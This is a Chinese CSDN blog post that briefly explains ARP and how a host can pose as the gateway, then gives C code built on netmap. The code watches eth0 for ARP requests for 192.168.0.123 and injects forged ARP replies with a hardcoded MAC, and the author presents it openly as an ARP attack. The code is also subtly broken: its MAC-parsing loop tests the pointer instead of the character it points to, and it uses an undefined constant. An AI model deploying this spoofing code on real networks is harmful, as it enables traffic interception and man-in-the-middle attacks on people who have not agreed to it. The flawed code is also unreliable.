ARP协议以及攻击

最新推荐文章于 2022-06-30 10:50:32 发布
最新推荐文章于 2022-06-30 10:50:32 发布
阅读量2.2k 收藏
点赞数
分类专栏: 技术 日志 文章标签: udp c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34954047/article/details/124182770
版权

目录

ARP简介

ARP是什么

ARP(地址解析协议),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址。

ARP攻击

  1. 局域网中的成员需要将网络数据发送出局域网,进入广域网,需要经过网关转发数据,但是一开始并不知道网关是在哪里,那么就需要广播寻找网关
  2. 现在局域A与B属于同一局域网,A开始寻找网关,向局域网发起广播,B收到ARP广播后,立刻回复:我这边是网关,来找我呀。
  3. A得到了虚假网关信息,开始将信息发向B, 又或者B伪造的一个物理地址。

ARP协议内容

在这里插入图片描述

code

头文件

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#include <sys/poll.h>
#include <arpa/inet.h>


#define NETMAP_WITH_LIBS

#include <net/netmap_user.h>

ARP协议


struct ethhdr {
	unsigned char h_dest[ETH_ALEN];
	unsigned char h_source[ETH_ALEN];
	unsigned short h_proto;
};


struct arphdr {
	unsigned short h_type;
	unsigned short h_proto;
	unsigned char h_addrlen;
	unsigned char protolen;
	unsigned short oper;
	unsigned char smac[ETH_ALEN];
	unsigned int sip;
	unsigned char dmac[ETH_ALEN];
	unsigned int dip;
};

struct arppkt {
	struct ethhdr eh;
	struct arphdr arp;
};

ARP攻击


void print_mac(unsigned char *mac) {
	int i = 0;
	for (i = 0;i < ETH_ALEN-1;i ++) {
		printf("%02x:", mac[i]);
	}
	printf("%02x", mac[i]);
}

void print_ip(unsigned char *ip) {
	int i = 0;

	for (i = 0;i < 3;i ++) {
		printf("%d.", ip[i]);
	}
	printf("%d", ip[i]);
}
void print_arp(struct arppkt *arp) {
	print_mac(arp->eh.h_dest);
	printf(" ");

	print_mac(arp->eh.h_source);
	printf(" ");

	printf("0x%04x ", ntohs(arp->eh.h_proto));
	printf("  ");
	
}
int str2mac(char *mac, char *str) {

	char *p = str;
	unsigned char value = 0x0;
	int i = 0;

	while (p != '\0') {
		
		if (*p == ':') {
			mac[i++] = value;
			value = 0x0;
		} else {
			
			unsigned char temp = *p;
			if (temp <= '9' && temp >= '0') {
				temp -= '0';
			} else if (temp <= 'f' && temp >= 'a') {
				temp -= 'a';
				temp += 10;
			} else if (temp <= 'F' && temp >= 'A') {
				temp -= 'A';
				temp += 10;
			} else {	
				break;
			}
			value <<= 4;
			value |= temp;
		}
		p ++;
	}

	mac[i] = value;

	return 0;
}

void echo_arp_pkt(struct arppkt *arp, struct arppkt *arp_rt, char *hmac) {

	memcpy(arp_rt, arp, sizeof(struct arppkt));

	memcpy(arp_rt->eh.h_dest, arp->eh.h_source, ETH_ALEN);
	str2mac(arp_rt->eh.h_source, hmac);
	arp_rt->eh.h_proto = arp->eh.h_proto;

	arp_rt->arp.h_addrlen = 6;
	arp_rt->arp.protolen = 4;
	arp_rt->arp.oper = htons(2);
	
	str2mac(arp_rt->arp.smac, hmac);
	arp_rt->arp.sip = arp->arp.dip;
	
	memcpy(arp_rt->arp.dmac, arp->arp.smac, ETH_ALEN);
	arp_rt->arp.dip = arp->arp.sip;

}

int main() {
	
	struct ethhdr *eh;
	struct pollfd pfd = {0};
	struct nm_pkthdr h;
	unsigned char *stream = NULL;

	struct nm_desc *nmr = nm_open("netmap:eth0", NULL, 0, NULL);
	if (nmr == NULL) {
		return -1;
	}

	pfd.fd = nmr->fd;
	pfd.events = POLLIN;

	while (1) {
		int ret = poll(&pfd, 1, -1);
		if (ret < 0) continue;
		
		if (pfd.revents & POLLIN) {
			stream = nm_nextpkt(nmr, &h);
			eh = (struct ethhdr*)stream;

			if (ntohs(eh->h_proto) == PROTO_ARP) {

				struct arppkt *arp = (struct arppkt *)stream;
				struct arppkt arp_rt;

				if (arp->arp.dip == inet_addr("192.168.0.123")) {
					echo_arp_pkt(arp, &arp_rt, "00:50:56:33:1c:ca");
					nm_inject(nmr, &arp_rt, sizeof(struct arppkt));
				}
			}
		} 
	}
}
域中四大
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
arp协议扫描和简单攻击
04-19
通过分析和运行这些代码,你可以更好地理解ARP协议的工作方式以及如何利用Python进行网络扫描和实施简单的网络攻击。不过,请注意,任何未经授权的网络扫描和攻击都是非法的,应在合法的环境中进行学习和实验。
DNS协议
weixin_44842905的博客
07-11 1447
DNS概述 DNS:域名系统,记录了各种主机域名与IP地址的对应关系。 端口:UDP 53端口,某些情况下也可以切换到TCP 53端口 域: 域是一个逻辑上的概念,Internet组织将计算机划分为了若干个大类,如com,gov,net,org,edu,cn,us等 每一个大类称之为一个域 每个大类里划分出较小一点的,成为子域,域是可以嵌套的,大域包含小域,小域包含更小的域 域名: 在每个域里面都有很多主机,每个主机都有一个主机名,在主机名后门冠上主机所在域的名称成为该主机在Internet网络上
搭建DNS部署
weixin_64814295的博客
06-30 620
DNS
DNS 原理入门
02-22 237
导读 DNS 是互联网核心协议之一。不管是上网浏览,还是编程开发,都需要了解一点它的知识。 本文详细介绍DNS的原理,以及如何运用工具软件观察它的运作。我的目标是,读完此文后,你就能完全理解DNS。 一、DNS 是什么? DNS (Doma...
DNS域欺骗攻击详细教程之Linux篇
程序媛想事儿
01-13 8281
DNS欺骗即域名信息欺骗是最常见的DNS安全问题。当一个DNS服务器掉入陷阱,使用了来自一个恶意DNS服务器的错误信息,那么该DNS服务器就被欺骗了。DNS欺骗会使那些易受攻击的DNS服务器产生许多安全问题,例如:将用户引导到错误的互联网站点,或者发送一个电子邮件到一个未经授权的邮件服务器。
ARP欺骗攻击.rar
04-04
然而,ARP协议本身的无认证特性使得它容易被恶意攻击者利用,进行ARP欺骗。 ARP欺骗攻击的基本原理是攻击者通过发送虚假的ARP响应,将目标主机的IP地址与错误的MAC地址关联,导致数据包被错误地转发到攻击者而非...
arp冲突攻击
08-05
然而,ARP协议本身缺乏安全机制,这为攻击者提供了可乘之机。 在ARP冲突攻击中,攻击者会伪造ARP响应,将自己伪装成网络上的另一台设备,例如网关或路由器。这种欺骗行为会导致数据包被错误地发送到攻击者的机器,...
局域网ARP攻击检测器
04-16
然而,ARP欺骗攻击是利用ARP协议的缺陷,通过发送虚假的ARP响应来篡改网络设备的IP-MAC映射关系,进而控制或中断网络通信,甚至可以实施中间人攻击,窃取敏感信息。 【ARP攻击检测器】主要功能可能包括: 1. 实时...
ARP协议详解 攻击原理简单攻击源码
06-28
ARP 协议详解与攻击原理 ARP 协议是以太网设备中用于解析 IP 地址与 MAC 地址的对应关系的协议。它的工作原理是将 IP 地址与 MAC 地址对应起来,以使 IP 数据包能够正确地传输到目标设备。 ARP 协议的工作原理可以...
DNS服务器搭建与配置
热门推荐
曹世宏的博客
10-16 2万+
title: DNS服务器搭建与配置 date: 2018-10-15 21:20:07 tags: [Linux笔记,Linux服务] categories: Linux DNS服务介绍 DNS服务简介: DNS(Domain Name System–域名系统),是因特网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。是一个应用层的协议DNS使用...
Centos下内网DNS主从环境部署记录
jj1130050965的博客
02-24 2363
Centos下内网DNS主从环境部署记录 一、DNS是什么? DNS(Domain Name System),即域名系统。它使用层次结构的命名系统,将域名和IP地址相互映射,形成一个分布式数据库系统。 DNS采用C-S架构,服务器端工作在UDP协议端口53和TCP协议端口53上。FQDN(Fully Qualified Domain Name)完全限定域名,它是使用DNS的树状层级结构的完全路径域名来表示一个准确位置对应的主机。DNS提供正向解析(FQDN-->IP)和反向解析(IP--.
Linux——DNS服务搭建、正反向解析、主从DNS
blueicex2017的博客
02-05 3994
————Blueicex 2020/2/4 7:50 blueice1980@126.com
dns服务器反向配置文件,DNS服务器配置案例精讲--反解区域配置测试及泛域名解析...
weixin_39739395的博客
08-04 787
三、反向区域配置及测试反向区域:区域名称:网络地址反写 .in-addr.arpa.192.168.88.--> 88.168.192.in-addr.arpa.1)、定义区域zone "ZONE_NAME" IN {type {master|slave|forward};file "网络地址.zone";};2)、定义区域解析库文件注意:不需要MX和A,以及AAAA记录;以PTR记录为主示...
找不到dns linux,linux – 服务器找不到XXX.in-addr.arpa:NXDOMAIN
weixin_31948907的博客
05-13 2737
我在配置BIND DNS播出服务器时遇到问题找不到XXX.in-addr.arpa:NXDOMAIN而反向dns检查!一切都适用于正向DNS查找,但反向DNS查找失败.这是我的配置文件named.conf中options {listen-on port 53 { 192.168.10.1; }; // listen-on-v6 port 53 { ::1; };directory ...
DNS域名解析详解
weixin_43473780的博客
03-24 1787
文章目录DNS域名解析详解域名DNS服务器区域数据库文件Bind的安装和配置正反解析区域的配置流程主从服务器搭建子域授权bind中的安全相关配置文末,再简单用一句话理解下DNS服务器中,递归查询和迭代查询 DNS域名解析详解 在我们日常浏览网页中,DNS解析是不可缺少的一环,用户在浏览器输入一个网址,计算机会将该地址解析成为ip地址,而后根据ip地址寻找到对应的服务器,请求服务! 那么,将网址转换...
什么是DNS的正向解析与反向解析?代码实现?
chen1415886044的博客
10-09 1万+
DNS采用C/S机制。实现域名与IP地址转换。DNS服务器用于存储资源记录并提供名称查询服务,DNS客户端也称解析程序,用来插叙服务器并获取名称解析信息。 正向解析与反向解析 按照DNS查询目的,可将DNS解析分为以下两种类型。 正向解析 根据计算机的DNS名称(即域名)解析出相应的IP地址。 反向解析 根据计算机的IP地址解析其DNS名称,多用来为服务器进行身份验证。 大部分DNS解析都是正向解析,即根据DNS域名查询对应的IP地址及其他相关信息。正向解析又称标准查询。正向解析记录存储在正
dns详解(一)
weixin_33716154的博客
11-21 777
一:DNS(DomainNameService),协议 二:DNS服务相关概念 三:DNS的实现方式 四:主配置文件格式 五:测试工具 六:配置正向区域 一:DNS(Domain Name Service),协议 C/S 53/{tcp,udp}:默认使用该协议通信 :主要是用udp实现解析 ...
wireshark分析ARP协议
最新发布
03-30
ARP协议是一种用于将IP地址映射到物理地址的协议。在局域网中,每个主机都有一个唯一的MAC地址,而IP...通过Wireshark分析ARP协议可以帮助我们更好地了解网络通信的过程,同时也可以帮助我们识别并防范一些网络攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值